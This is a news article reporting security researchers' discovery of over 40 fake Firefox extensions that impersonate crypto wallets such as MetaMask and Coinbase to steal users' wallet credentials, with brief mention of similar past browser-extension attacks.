Malicious Firefox extensions mimic MetaMask, Coinbase to steal crypto

Researchers at cybersecurity firm Koi Security have flagged over 40 fake Firefox extensions designed to steal cryptocurrency wallet credentials by impersonating popular platforms like MetaMask, Coinbase, and OKX.

Cryptocurrency assets held by Firefox users, a widely used open-source browser, are at risk, according to a recent report from the security firm.

A large-scale campaign, active since at least April 2025, is leveraging malicious extensions still available on the Mozilla Add-ons store, highlighting significant gaps in the browser’s plugin vetting process.

Koi Security warns that these fake extensions mirror legitimate wallet offerings with alarming accuracy, using the same names, logos, and branding to deceive users.

In many cases, the extensions replicate the code of open-source wallets, with malicious code discreetly inserted to swipe cryptocurrencies while functioning as a normal plugin.

Some of the brands impersonated by the fake Firefox extensions include MetaMask, Coinbase, OKX, Trust Wallet, Phantom, Exodus, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox.

Earlier this year, OKX warned of a fake browser extension listed on the Firefox store, which mimicked the exchange’s origins plugin to steal credentials from the victims’ wallets.

Malicious extension still live on Firefox store

Koi linked the campaign to over 40 individual extensions through shared tactics, techniques, and procedures, as well as overlapping infrastructure. 

According to the report, the campaign is currently “active, persistent, and evolving,” with new versions of the extensions continuing to appear despite takedown efforts. The latest uploads were detected as recently as June.

Once installed, the fake extensions silently extract wallet secrets and transmit them to a remote server controlled by the attackers. 

In addition to stealing login credentials, the malware captures users’ external IP addresses, potentially to aid in further profiling or follow-on attacks.

To encourage downloads, attackers also exploit trust mechanisms on the plugin marketplace.

Many of the fake extensions are propped up with hundreds of fake five-star reviews, far exceeding what would be expected based on actual user installations.

Koi found signs pointing to a Russian-speaking threat actor, including Russian-language comments embedded in the extension code and metadata retrieved from a command server used in the operation. 

While attribution remains tentative, Koi researchers believe these indicators suggest a well-organized and technically proficient group.

The scale and sophistication of the campaign pose a significant threat to crypto users.

By hijacking browser extensions, a commonly trusted tool among traders and investors, attackers can bypass traditional phishing defences and gain direct access to wallets. 

Since these extensions often operate with elevated permissions, they can compromise a victim’s accounts without them being able to detect it until it’s too late.

An age-old tactic

Campaigns such as these underscore the risks retail crypto users face, especially as cryptocurrency adoption increases and browser-based wallet interactions become more common. 

According to a NASAA survey, crypto-related fraud and social media-based scams remain among the top threats to investors in 2025.

Over the past years, malicious browser extensions have become a prominent tool in the cybercriminal’s arsenal, with incidents surfacing across other browsers as well.

For instance, in March, a compromised version of the Chrome proxy tool SwitchyOmega was found stealing private keys from crypto wallets after a phishing attack enabled malicious code injection. 

Another malicious Chrome extension dubbed “Bull Checker” was flagged by Solana-based DEX Jupiter last year. The extension drained user wallets by modifying transaction payloads.

Similar tactics have also been employed in earlier campaigns involving fake versions of the Ledger Live app and Aggr trading tools.

Some extensions prompt users to input their seed phrases during setup or secretly collect browser cookies, which are then used to reconstruct passwords and access crypto accounts.

The post Malicious Firefox extensions mimic MetaMask, Coinbase to steal crypto appeared first on Invezz